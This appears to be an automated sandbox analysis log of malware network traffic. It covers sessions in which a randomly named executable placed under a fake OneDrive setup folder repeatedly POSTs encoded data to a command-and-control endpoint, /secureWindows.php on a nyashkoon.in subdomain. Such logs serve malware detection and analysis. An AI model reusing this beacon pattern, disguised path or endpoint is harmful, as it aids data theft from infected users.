                                                        37 | 192.168.2.4 | 49773 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:38.684258938 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:39.043608904 CET1076OUTData Raw: 52 50 59 55 55 5f 53 50 58 57 50 59 55 5c 5b 58 54 5b 5c 5b 59 51 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RPYUU_SPXWPYU\[XT[\[YQZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%-#"]=()$=/C:&+&<8:#*,293\(5$^>.* F$,Z*5
                                                        Oct 30, 2024 05:22:39.278875113 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:39.582886934 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkHCyuIssenteRhGCXoFyuLu4Vzz%2FnjJr4%2FJvGzIEOKuopEoWGn%2BPadyghzJVGQdUMCU%2FqjqHWKWAfr07Pw015oPKDuVnP5rc2pKCD%2BhzAMw%2BjAlHOrSBeseHU7M3bOz%2FzqNmkOMPkg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a01f2c6b2d33-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1361&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1019000&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        38 | 192.168.2.4 | 49774 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:39.716118097 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:40.074007034 CET1076OUTData Raw: 52 50 59 57 55 5c 56 5c 58 57 50 59 55 5b 5b 58 54 5f 5c 54 59 53 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RPYWU\V\XWPYU[[XT_\TYSZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%83"Y?*Z'[;B95$2=#8)( )41X<%*$(.9 F$,Z*)
                                                        Oct 30, 2024 05:22:40.314851999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:40.631532907 CET | 783 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sku8q8GovJ1q2A6RPQDkmNGQsYy9xMZfTB%2Fpg9MNMw0v1JS1OrCiGPSjx4TCQcxisfYko9HHqC1KUURo1Irx3sN5e6HJWno3NiduGPk4D1h13hHIZTmCdjrCixfsR9%2FYKnUwGPj5Ifc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0259d9d2c85-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1657&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=962765&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        39 | 192.168.2.4 | 49775 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:40.763546944 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:41.120750904 CET | 1076 | OUT | Data Raw: 57 51 59 50 55 58 56 5d 58 57 50 59 55 5c 5b 5a 54 53 5c 58 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYPUXV]XWPYU\[ZTS\XYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,:?8X0>;D.%%(X/ /]197)5"&+*.* F$,Z*5
                                                        Oct 30, 2024 05:22:41.358603001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:41.558119059 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDWbaShbZbBIGlOPW%2Bmfr0Dwip%2F33VKnqOHa3ssc7esAYtFYr20g4C5KpudI7Vvj3EnEvjTz87UH%2BCbzoA5UU1ZNC5ZAUjT0jrh%2B2Hg1yTpXkwaoBIwk4Tx4IJ95gOgzV2WXkFhewJw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a02c2e8c4758-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1266841&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        40 | 192.168.2.4 | 49776 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:41.683218002 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:42.042752028 CET | 1076 | OUT | Data Raw: 52 52 5c 51 50 5f 56 5c 58 57 50 59 55 51 5b 53 54 53 5c 59 59 53 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RR\QP_V\XWPYUQ[STS\YYSZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,!=;>Z$-#E.54^%[<84\#:;%+)%*$(*: F$,Z*
                                                        Oct 30, 2024 05:22:42.279886007 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:42.491875887 CET | 794 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36%2BsvAtW8gnjatJY%2FrXiH43seB8uRTYRYD79Yv5gPbDsGxm%2FzChldER0QfrXHUPDSIr%2Fdu1eTRq4qMctUI%2B09AefkPNwAcsa5nfJ5gi6Bu6HVm%2F1SNn1rjrB9ToH36kdiooxv8%2BecCk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a031e9dee72a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1101&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1329660&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        41 | 192.168.2.4 | 49777 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:42.629291058 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:42.980463028 CET | 1076 | OUT | Data Raw: 57 50 5c 55 55 58 56 50 58 57 50 59 55 5d 5b 53 54 5b 5c 5c 59 54 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\UUXVPXWPYU][ST[\\YTZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/ +*\%-D.%(Z&[?8:? ;Y1/<%1[$8=:* F$,Z*1
                                                        Oct 30, 2024 05:22:43.238918066 CET | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        42 | 192.168.2.4 | 49778 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:43.388554096 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:43.745708942 CET | 1340 | OUT | Data Raw: 57 5f 5c 57 55 5a 53 51 58 57 50 59 55 5c 5b 5e 54 58 5c 58 59 51 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\WUZSQXWPYU\[^TX\XYQZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,0!?(2[''E:4^2;,:#$1 <9^$^9: F$,Z*5
                                                        Oct 30, 2024 05:22:43.989619970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:44.191812038 CET | 933 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNITV3AV%2BYfhUq%2BOjR447lYp09kPDGm3P64RitEpocUWH3jaN8lg5z7mD6gsWzcyRWjAl8X0W5ApU9JRHcau9BpLHsfEwBv8faTpcmHCn9g94nWy0bnOZVbiiNbpMWCr989ryzvB1uQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a03c9cf46c38-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1288256&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 25 0e 2b 01 30 54 32 33 21 02 28 2f 2e 02 29 58 22 58 24 31 0a 15 26 2f 2d 06 2a 28 20 00 3e 24 0a 59 28 54 38 5a 23 36 09 00 3d 11 2f 46 0c 10 24 00 33 31 27 54 3f 55 21 58 29 28 27 5e 23 0e 2d 00 29 00 30 08 35 33 06 59 26 21 2e 56 38 3d 22 1d 2e 43 22 12 2f 23 20 53 3d 00 21 57 08 14 21 02 32 02 3f 1b 31 03 24 59 32 31 35 07 37 01 23 5d 21 3b 2a 5d 3f 2b 01 0e 31 30 1d 06 30 0d 0a 0a 32 39 01 04 3c 57 3b 51 27 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98%+0T23!(/.)X"X$1&/-*( >$Y(T8Z#6=/F$31'T?U!X)('^#-)053Y&!.V8=".C"/# S=!W!2?1$Y2157#]!;*]?+10029<W;Q'3"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        43 | 192.168.2.4 | 49779 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:43.497107983 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:43.855068922 CET | 1076 | OUT | Data Raw: 57 54 5c 50 55 58 53 50 58 57 50 59 55 5a 5b 58 54 5b 5c 5b 59 5d 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WT\PUXSPXWPYUZ[XT[\[Y]ZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;0?!'[+9%[% ,:#\'Z%9?]<9['69 F$,Z*-
                                                        Oct 30, 2024 05:22:44.099487066 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:44.421924114 CET | 790 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=upBHZ6e1MuLO6ivnFSF%2BYdlR4GBVooHKQ6vlDLQ%2BCyy93lIxJHpIUZLPbn8KPYtr6%2BJt0Bza0KnhIB22HjZPdlWNbq91ckF3vNyQKjaKFPFdNMiqE%2FpV%2BMZ9GqsnIrrSgjLgV6tkMsg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a03d4ba32c8b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1301&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1098634&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        44 | 192.168.2.4 | 49780 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:44.564860106 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:44.927875042 CET | 1076 | OUT | Data Raw: 57 57 5c 5c 55 5f 56 56 58 57 50 59 55 59 5b 5a 54 5e 5c 5a 59 50 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\\U_VVXWPYUY[ZT^\ZYPZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_,0!=8"Z''E,572=3;? )7\&]?5^&(-Y- F$,Z*!
                                                        Oct 30, 2024 05:22:45.167274952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:45.364953995 CET | 782 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E75cdJhXUwV7fNbAtEqFTIV1rTObw60Fd9m7bkNTGjhamuNx0WIFMa4tcqJ5ga0u5kL5MZZBxCfijwoNi1QJX%2Fk8EdUEJQzsodUySooWIqpkFZr90lxM3D738SZfB5yeHQsfTcwWdfU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a043f88e0b76-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1071005&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        45 | 192.168.2.4 | 49781 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:45.503715038 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:45.855384111 CET | 1072 | OUT | Data Raw: 52 54 5c 57 55 58 56 55 58 57 50 59 55 58 5b 59 54 59 5c 5b 59 55 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\WUXVUXWPYUX[YTY\[YUZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z, (8'-'E-%,^&[<_8*#\+X&(&![0-: F$,Z*)
                                                        Oct 30, 2024 05:22:46.108968019 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:46.429713964 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6%2FpesHH2nXKAowkdZFAP%2FMf1t30RZIyhIftPfmK%2BQM05yk8ZDtMyGqzmvItyrwd1drryqPzK%2FXc7pI5s88%2B5pDrGMn3chLHASmSLFcI1ReWCLB2DyRnVIcJtpApPjltPxRt20psRo0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a049dbaa4763-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1358&delivery_rate=1171521&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:46.429755926 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        46 | 192.168.2.4 | 49782 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:46.568852901 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:46.917681932 CET | 1072 | OUT | Data Raw: 57 55 5c 52 55 55 56 50 58 57 50 59 55 58 5b 58 54 5d 5c 5d 59 53 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WU\RUUVPXWPYUX[XT]\]YSZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,=+=$#.2=0X;:?7*8%,<&9Z$+)-* F$,Z*-
                                                        Oct 30, 2024 05:22:47.163036108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:47.478554964 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDJn%2By1qY3XCjtdXrXUxgyMK0%2B5%2FUvhSA31d6toUjpRWysgPRC613yjAkGI7TFkRPr7CuuO7zQ9zmVWS2ppxjh90WkKKpIQeuavR6F7XpmjYcLot8XrNy1PeS4fj0iCx552MHRVfCHY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
